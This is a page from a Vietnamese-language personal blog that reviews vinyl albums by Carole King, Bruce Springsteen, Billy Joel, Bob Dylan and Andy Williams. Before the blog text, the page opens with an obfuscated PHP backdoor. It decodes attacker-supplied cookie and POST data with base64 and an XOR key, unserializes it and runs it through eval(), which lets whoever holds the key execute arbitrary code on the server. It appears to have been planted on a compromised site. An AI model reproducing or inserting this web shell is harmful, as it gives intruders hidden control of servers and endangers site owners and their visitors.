$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> B.l.u.e – Page 7 – Inside the crowd, I dance [alone]

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Page 7 of 33

Carole King – Music

Music là album thứ 3 của Carole King, ra ngay sau Tapestry đầy nổi tiếng (mà mình đã nhắc ở đây). Tuy Music cũng có những thành công nhất định, nhưng so với Tapestry thì vẫn không lại được. Nhưng, nhìn chung, it is still one of her finest.

Giọng của Carole trong album này mình có thể không thích bằng Tapestry, thậm chí có đôi lúc thấy giọng cô hơi yếu để trình bày một số bài đòi hỏi chút mạnh mẽ như Carry Your Load. Tuy nhiên, giai điệu của album ổn hơn rất nhiều, nhất là những lúc Carole chơi đại dương cầm hay đàn celesta. Album cũng thể hiện rõ nét khả năng sáng tác tuyệt vời của Carole, với những hit như It’s Gonna Take Some Time (sau này The Carpenters cũng hát).

Bài mình thích trong album này là MusicSong of Long Ago (back vocal bởi James Taylor).

Music is playing inside my head
Over and over and over again
My friend, there’s no end to the music

Carole King – Tapestry

Tapestry là một trong những album bán chạy nhất, và đứng vị trí #36 trong bảng xếp hạng 500 album xuất sắc nhất mọi thời đại của tạp chí Rolling Stones. Nó cũng mang lại tới tận 4 giải Grammy cho Carole King.

Thật ra, mình không hẳn là fan của thể loại folk pop nhẹ thế này. Nhưng cũng như đa phần bộ sưu tập của mình, khi thấy đĩa này nằm trên kệ đĩa tại một cửa hàng bán đồ cũ, mình không do dự mua ngay. $1 để được nghe record nổi tiếng thế này, dù có thích hay không cũng sẽ đáng.

Đúng như mình nghĩ, Tapestry có lẽ sẽ hợp với các cô gái bên ngoài gồ ghề nhưng lại mỏng manh yếu đuối sống nội tâm hay khóc thầm hơn. Nhưng không có nghĩa là mình không thích. Có những bài cực kì cheesy, nghe lúc nửa đêm trong không gian vô cùng tĩnh lặng, cái giọng thô ráp của Carole vang lên nghe hay gì đâu. Nó sến, nó từ tốn, nó hơi thô và giọng ca sĩ chính không hoàn hảo lắm về mặt thanh nhạc, nhưng mang lại cảm giác lạ ít thấy ở những giọng ca nữ khác, đặc biệt trong thể loại folk pop này.

 

 

Bruce Springsteen – Born in the U.S.A.

Born in the U.S.A là album thành công nhất trong sự nghiệp ca hát của Bruce Springsteen. Thật ra, nếu không từng trải qua cuộc sống ở Mỹ thì có lẽ album này khá khó nghe để thích. Nhìn lại hoàn cảnh và chủ đề xuyên suốt của album, sẽ có cảm giác album này sáng tác chỉ để dành riêng cho nước Mỹ, người Mỹ, và giá trị Mỹ.

Born in the U.S.A. được ra mắt vào lúc tinh thần và giá trị dân tộc trong lòng người dân Mỹ đang xuống rất thấp, sau hàng loạt sự kiện như Watergate (1972) tủi hổ, thất bại tại miền Nam Vietnam (1975) nhục nhã, và khủng hoảng giải cứu con tin ở Iran (1979) đầy đau thương. Chính vì vậy, việc album này như một làn gió mới thổi bùng lên cái giá-trị-Mỹ đang bị nhấn chìm bấy lâu, nên được đông đảo dân Mỹ yêu thích cũng không có gì lạ.

Như đã nói ở trên, Born in the U.S.A. rất thân thuộc với những ai sinh ra ở Mỹ, hay từng có thời gian sống ở Mỹ. Là một album viết về niềm tự hào và tình yêu dành cho nước Mỹ, nhưng Born in the U.S.A. hoàn toàn không có tính tuyên truyền và định hướng, trái lại nói về những việc rất bình thường và giản đơn.

Darlinton County về hai anh chàng trẻ, nhưng hàng bao ngàn thanh niên Mỹ đó giờ, thích lái xe trên những con đường xuyên bang, dừng lại ở một thị trấn nhỏ ven đường và tán tỉnh các cô em xinh hiền nơi đó. Hay Working On The Highway là câu chuyện về lớp công nhân vất vả, chăm chỉ làm việc, và mối tình với một cô gái gặp ở buổi tiệc nhảy nào đó. Bobby Jean là bài nhạc được cho là viết tặng một thành viên đã rời band. Hay Downbound Train – có lẽ là bài buồn nhất Bruce từng viết…

Khi mình thấy record này ở một tiệm bán đĩa cũ, mở ra ngạc nhiên thay mọi thứ còn hầu như rất mới, mình mua ngay mà không cần nghĩ suy. Vì tuy rằng mình ở Mỹ chưa lâu, nhưng đã có một phần trong mình cảm nhận được rất nhiều những giá trị Mỹ mà Bruce muốn truyền tải. Thật ra, giá trị Mỹ không hẳn là những gì cao siêu, mà có thể nó đến từ những điều thật bình dị, bình dị chỉ như cuộc sống, như những câu chuyện quanh ta..

Billy Joel – The Stranger

Mình có biết tiếng Billy Joel nhưng chưa hề nghe ông hát cho tới khi thấy vài đĩa vinyl của ông ở một tiệm thrift store gần nhà. Mình nghĩ rằng mình ghiền nghe Billy Joel ngay từ những tiếng nhạc đầu tiên. Có những đĩa của ông cả buổi mình nghe không biết chán. Nhạc của Billy nhìn chung là nhẹ nhàng, lời sâu sắc, nhưng không thiếu chỗ ngẫu hứng một cách rất tự nhiên và sảng khoái.

Mình có vài record của Billy Joel, The Stranger có thể tính là record đầu tiên mình nghe trọn vẹn. Nó hay, như ta hay nói, tuyệt cú mèo. Thật ra, phần lời của album này có thể chưa đạt lắm, có nhiều bài nếu nói là cheesy để ăn khách thì thôi cũng được. Nhưng phần nhạc và phần phối hay toả sáng đến mức đủ che giấu thiếu sót đó. Khi thì là tiếng guitar khoan thai, khi thì tiếng piano dồn dập, tiếng đàn phong cầm đầy rộn rã… ở từng thời khắc của tâm trạng mà vang lên, khiến người nghe không còn biết làm gì khác ngoài gật gù, lắc lư theo điệu nhạc. Hiệu ứng này có được nhờ tài phối tuyệt vời của Phil Ramone – người được xem như là một ‘huyền thoại’ trong ngành công nghiệp thu và hoà âm.

The Stranger là album nổi tiếng và thành công nhất của Billy Joel (nếu không tính vài album tổng hợp sau này). Nó cũng mang lại cho ông giải Grammy đầu tiên trong cuộc đời. Có tới 4 trên 9 bài lọt vào Billboard Hot 100 khi ra mắt, đó là “Just the Way You Are” (#3), “Movin’ Out” (#17), “Only the Good Die Young” (#24), and “She’s Always a Woman” (#17). Mình xem qua kha khá review về album này, thì ngoài việc ai cũng cho rằng album này tuyệt và đáng nghe cực, mỗi người đều có một ý kiến khác nhau về ca khúc chuẩn nhất trong album. Với mình là The Stranger.

Ca khúc cùng tên album không hiểu sao không được đánh giá cao, nhưng nó là ca khúc, không chỉ trong album này, mà có lẽ còn là một trong những ca khúc của Billy Joel mà mình thích nhất. Ngay từ những note đầu mở màn bằng tiếng huýt sáo buồn nẫu ruột, cho tới lúc những tiếng dương cầm dồn dập và giọng của Billy Joel vang lên, mình như nín thở nuốt từng giây phút của nhạc. Lời của The Stranger cũng rất lạ, phải nghe và ngẫm một hồi mới hình dung được Billy muốn truyền tải gì qua bài hát. Buồn, buồn lắm…

 

Well we all have a face
That we hide away forever
And we take them out and show ourselves
When everyone has gone

Bob Dylan – Bringing It All Back Home

Bringing It All Back Home là album thứ hai của Bob Dylan mà mình có. Đúng ra, đây không hẳn là album của Bob mà mình thích nhất, nhưng là một trong những album quan trọng và đặc biệt của Bob mà mình muốn sở hữu. Chỉ thế.

Không có những bài đẹp và thanh bình như tranh vẽ, xen lẫn tinh thần phản chiến và ủng hộ các phong trào xã hội ở các album trước, Bringing It Back Home cho thấy một Bob Dylan khác – một Bob Dylan như ở một thế giới khác. Âm nhạc của ông đi dần theo chủ nghĩa siêu thực. Có một câu chuyện thú vị, là trong khoảng thời gian này, Bob Dylan lần đầu hội kiến The Beatles – hai cái tên hay được thính giả đặt lên bàn cân so sánh. Và như kể lại, Bob Dylan đã lần đầu giới thiệu The Beatles đến với thế giới diệu kì của cần sa và thuốc phiện. Ừ, và có vẻ những album sau này của cả Bob Dylan lẫn The Fab Four cũng kì diệu như thế.

Mà thôi, hãy trở lại với Bringing It All Back Home.

Nhiều người xem đây không chỉ là album hay nhất của Bob Dylan mà còn là album hay nhất trong lịch sử nhạc rock. Cả hai vế đều có chỗ đúng hay chỗ sai tuỳ theo từng người. Không phải cái thứ nhạc pha trộn tài tình giữa chất folk kể chuyện đặc trưng từ đó giờ, với chút gì đó từ Chuck Berry (đặc biệt là ở những câu guitar trong bài hát mở màn Subterranean Homesick Blues) làm nên điểm đặc biệt trong album; mà là khả năng tưởng tượng không có giới hạn, thả lỏng mình theo âm nhạc xuyên suốt album mới khiến nó được đánh giá cao.

Không còn một Bob Dylan quan tâm đến phản chiến, đến hoạt động nhân quyền, chỉ còn một Bob Dylan bay bổng theo âm nhạc.

Thế thôi, có lẽ nói về Bringing It All Back Home thế thôi là đủ. Có những loại nhạc, phải tận tai nghe mới cảm nhận thấy khác được. Tin mình đi.

Bob Dylan – The Freewheelin’ Bob Dylan

Bob Dylan, có lẽ trong cả chiều dài lịch sử mấy trăm năm của âm nhạc thế giới từ xưa đến nay, hiếm kiếm được tính cách nào như ông. Với mình, Bob Dylan là người viết và kể chuyện xuất sắc nhất.

Bài viết này chỉ nhằm nêu lên cảm nhận ngắn của mình về record The Freewheelin’ Bob Dylan mà mình có, nên xin phép không đi quá sâu để nói về tiểu sử của ông. Record này là một trong những record ‘có giá trị’ đầu tiên mà mình bỏ tiền mua, chỉ vì thích quá và không thể chờ ôm cây đợi thỏ đi thrift store cho tới khi nào thấy được.

Mình đánh giá The Freewheelin’ Bob Dylan là album thuộc loại hay nhất của Bob. Có những bài trong album này đã đi cùng mình qua suốt những tháng năm đẹp và nhiều suy tư, mộng ảo nhất của tuổi trẻ. Từ Blowin’ In The Wind như là bản tuyên ngôn của thanh thiếu niên thập niên 60, cho tới Girl Of The North Country đã an ủi tâm hồn mình sau cuộc tình đổ vỡ với một cô gái, à, đến từ miền Bắc. Đây là album thứ hai được thu âm của Bob, và ngạc nhiên thay, nó đánh dấu một sự thay đổi rất lớn của ông so với album đầu tay. Nó mở ra một giai đoạn mà cả nước Mỹ ngỡ ngàng trước khả năng sáng tác và diễn hát như gió thổi mây trôi, liền mạch như một nhà thơ đang kể chuyện của ông. Những bài hát của ông, đó là nhạc, đó là chuyện, và đó là thơ.

Năm đó, Bob Dylan mới được 22.

Bìa record cũng đẹp thật lạ. Đó là hình Bob Dylan cùng cô bạn gái Suze Rotolo chụp ở một góc đường thành phố New York – rất gần với căn hộ của cặp đôi này, vào một ngày tháng 2 năm 1963. Hình ảnh chàng trai trẻ khẽ nhướng vai lên, nhìn khá bình thản, và bên cạnh là cô gái tươi tắn nép sát vào tay cậu ta, đã như trở thành biểu tượng. Không hiểu sao, có điều gì đó ở bìa record này khiến mình thấy yên bình và đẹp nghệ thuật đến lạ.

Một record mà những bài hát đã vượt lên đạt tầm vĩ đại, mà ảnh bìa cũng trở thành một trong những hình ảnh có tính biểu tượng cực cao, theo mình là một record xứng để đưa vào bộ sưu tập.

Andy Williams

Với Andy Williams ắt không cần phải giới thiệu dài dòng, vì ắt thính giả trên toàn thế giới đã quá quen thuộc với tên tuổi của ông. Là một trong những nam ca sĩ có thể sánh vai với ông hoàng nhạc Rock và Roll Elvis Presley về độ nổi tiếng cùng những thành công đạt được trong làng nhạc Hoa Kỳ và cả thế giới những năm 1960, 1970, nói về Andy Williams thì có lẽ vài lời cũng đã thừa, và ngàn dòng ắt vẫn còn thiếu. Andy Williams, đúng như cố Tổng thống Hoa Kỳ Ronald Reagan từng nhận xét, là một “báu vật quốc gia”. Cuộc đời hoạt động nghệ thuật của Andy trải dài với hàng loạt những album ăn khách vào loại bậc nhất.

Cũng như nhiều bạn trẻ Việt Nam khác, mình biết đến kha khá bài hát của ‘kinh điển’ của Andy, như một trong những bản tình ca xứng được liệt vào hàng kinh điển: Love Story; hoặc giả Can’t Get Used to Losing You, hay Can’t Take My Eyes From You, hoặc A Time For Us – bài nhạc chủ đề của Romeo & Juliet, hay là Moon River nổi tiếng trong Breakfast at Tiffany’s... Và cũng thật tình cờ, khi mình bắt đầu sưu tập đĩa than, thì đĩa của Andy nằm trong số những đĩa đầu tiên mà mình mua. Tới giờ, trong bộ sưu tập của mình thì Andy Williams cũng là nhiều nhất, lên tới 9 đĩa, và mình chắc sẽ còn tăng lên.

Thật khó để review riêng từng đĩa một, vì đĩa nào theo mình nghe cũng đều đáng giá. Ban đầu, mình tưởng chỉ những đĩa chứa các bài hát kinh điển và nổi tiếng mới đáng nghe, té ra không phải vậy. Có những đĩa của Andy mà mình có, như Solitaire hay Home Lovin’ Man, thậm chí không được thính giả đón nhận nồng nhiệt cho lắm vào thời điểm đó, với mình vẫn có những track đáng nghe. Giọng của Andy rất dễ chịu, nó nhẹ nhàng, trầm ấm và chan chứa tình cảm. Không mấy ca sĩ hát nhiều mà vẫn giữ được cái cảm xúc trong giọng hát như thế.

Andy Williams đã ra đi, và có lẽ, theo một thời gian, thứ nhạc của những năm 60, 70 cũ kĩ mà ông hát sẽ dần phủ bụi thời gian, không còn được ưa chuộng nồng nhiệt nữa; nhưng với mình, tên tuổi của Andy là không thể thay thế được. Rồi, lại có những lần cần tìm về cảm xúc xa xưa, mình lại bỏ đĩa vào, nghe Andy thủ thỉ và nhớ lại một thời trẻ dại từng biết yêu đắm say…

 

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.